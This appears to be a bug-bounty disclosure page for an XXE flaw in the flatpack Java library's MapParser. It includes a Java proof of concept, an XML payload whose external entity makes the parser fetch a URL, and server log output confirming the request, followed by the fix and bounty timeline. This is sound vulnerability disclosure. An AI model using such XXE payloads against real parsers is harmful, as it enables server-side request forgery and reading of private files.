Improper Restriction of XML External Entity Reference in appendium/flatpack

Valid

Reported on

Oct 18th 2021


Description

flatpack is vulnerable to XML External Entity (XXE) injection. An attacker who can supply a crafted XML file as input to the parse() function in MapParser.java can make the parser resolve external entities declared in the document's DTD, which is demonstrated below with an entity that triggers an outbound HTTP request.

Proof of Concept

import java.io.FileReader;
import java.io.Reader;

import net.sf.flatpack.xml.*;


public class Poc {

    public static void main(String[] args) {
        try {
            // Attacker-controlled XML containing an external entity declaration (see sample-ssrf.xml).
            Reader reader = new FileReader("C:\\Users\\srika\\eclipse-workspace\\poc\\src\\main\\resources\\sample-ssrf.xml");
            // MapParser.parse() resolves the entity, so the SYSTEM URL is fetched during parsing.
            MapParser.parse(reader, null);

        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

sample-ssrf.xml

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://127.0.0.1:8800/test.txt">]>
<foo>&xxe;</foo>

Output

Serving HTTP on :: port 8800 (http://[::]:8800/) ...
::ffff:127.0.0.1 - - [18/Oct/2021 15:10:34] "GET /test.txt HTTP/1.1" 200 -
We created a GitHub Issue asking the maintainers to create a SECURITY.md a month ago
We have contacted a member of the appendium/flatpack team and are waiting to hear back a month ago
We have sent a follow up to the appendium/flatpack team. We will try again in 7 days. a month ago
Benoit Xhenseval validated this vulnerability a month ago
Srikanth Prathi has been awarded the disclosure bounty
The fix bounty is now up for grabs
Benoit Xhenseval confirmed that a fix has been merged on 5ebef7 a month ago
Srikanth Prathi has been awarded the fix bounty